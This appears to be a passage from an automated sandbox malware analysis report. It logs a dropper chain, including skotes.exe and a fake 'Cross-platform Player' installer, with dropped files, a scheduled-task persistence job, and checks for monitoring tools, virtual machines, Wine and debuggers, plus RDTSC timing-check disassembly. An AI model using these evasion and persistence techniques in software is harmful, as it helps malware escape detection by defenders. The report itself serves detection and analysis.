Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-DIKDD.tmp
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe File created: C:\ProgramData\CrossPlatformPlayer\CrossPlatformPlayer.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1053901001\93f981a153.exe
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\Desktop\p199AjsEFs.exe File created: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp File created: C:\Users\user\AppData\Local\Temp\is-RHTN2.tmp\_isetup\_shfoldr.dll
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\msvcp100.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-56BQJ.tmp
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\uninstall\unins000.exe (copy)
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp File created: C:\Users\user\AppData\Local\Temp\is-RHTN2.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\icuuc51.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-5TPVM.tmp
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\uninstall\is-GPTU0.tmp
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\Qt5Concurrent.dll (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Temp\is-29I1I.tmp\_isetup\_shfoldr.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp File created: C:\Users\user\AppData\Local\unins000.exe (copy) Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-UO9UR.tmp Jump to dropped file
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe File created: C:\ProgramData\CrossPlatformPlayer\sqlite3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe File created: C:\ProgramData\CrossPlatformPlayer\sqlite3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe File created: C:\ProgramData\CrossPlatformPlayer\CrossPlatformPlayer.exe Jump to dropped file

Boot Survival

Source: C:\Users\user\Desktop\p199AjsEFs.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053901001\93f981a153.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_CacheMemory
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from CIM_Memory
Source: C:\Users\user\Desktop\p199AjsEFs.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\p199AjsEFs.exe System information queried: FirmwareTableInformation Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\p199AjsEFs.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: regsvr32.exe, 00000014.00000002.3406622182.00000000011CB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: X64DBG.EXE
Source: regsvr32.exe, 00000014.00000002.3406622182.00000000011CB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: WINDBG.EXE
Source: regsvr32.exe, 00000014.00000002.3406622182.00000000011CB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IDAQ.EXEH
Source: regsvr32.exe, 00000014.00000002.3406622182.00000000011CB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OLLYDBG.EXEZ
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B2AE11 second address: B2AE1A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B2AE1A second address: B2AE27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007FA3F4E97196h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B356AF second address: B356B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B356B9 second address: B356C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B35819 second address: B3581D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B3581D second address: B3582D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jns 00007FA3F4E97196h 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B35B1E second address: B35B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FA3F4513F34h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B37F36 second address: B37F3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B37F3A second address: B37FEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA3F4513F32h 0x0000000b popad 0x0000000c xor dword ptr [esp], 1C04AB93h 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007FA3F4513F28h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d mov ecx, edi 0x0000002f jmp 00007FA3F4513F32h 0x00000034 push 00000003h 0x00000036 add dword ptr [ebp+122D1DB1h], edx 0x0000003c or cx, 8F67h 0x00000041 push 00000000h 0x00000043 jmp 00007FA3F4513F35h 0x00000048 push 00000003h 0x0000004a add dword ptr [ebp+122D1DB1h], edi 0x00000050 call 00007FA3F4513F29h 0x00000055 jns 00007FA3F4513F2Ch 0x0000005b push eax 0x0000005c pushad 0x0000005d jl 00007FA3F4513F28h 0x00000063 pushad 0x00000064 popad 0x00000065 pushad 0x00000066 jns 00007FA3F4513F26h 0x0000006c pushad 0x0000006d popad 0x0000006e popad 0x0000006f popad 0x00000070 mov eax, dword ptr [esp+04h] 0x00000074 push eax 0x00000075 push edx 0x00000076 push eax 0x00000077 jp 00007FA3F4513F26h 0x0000007d pop eax 0x0000007e rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B37FEE second address: B37FF8 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA3F4E9719Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B37FF8 second address: B38005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B38005 second address: B38009 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B38009 second address: B3800D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B3800D second address: B3801D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B3801D second address: B3802C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA3F4513F26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B38151 second address: B38155 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\p199AjsEFs.exe RDTSC instruction interceptor: First address: B3820C second address: B38216 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
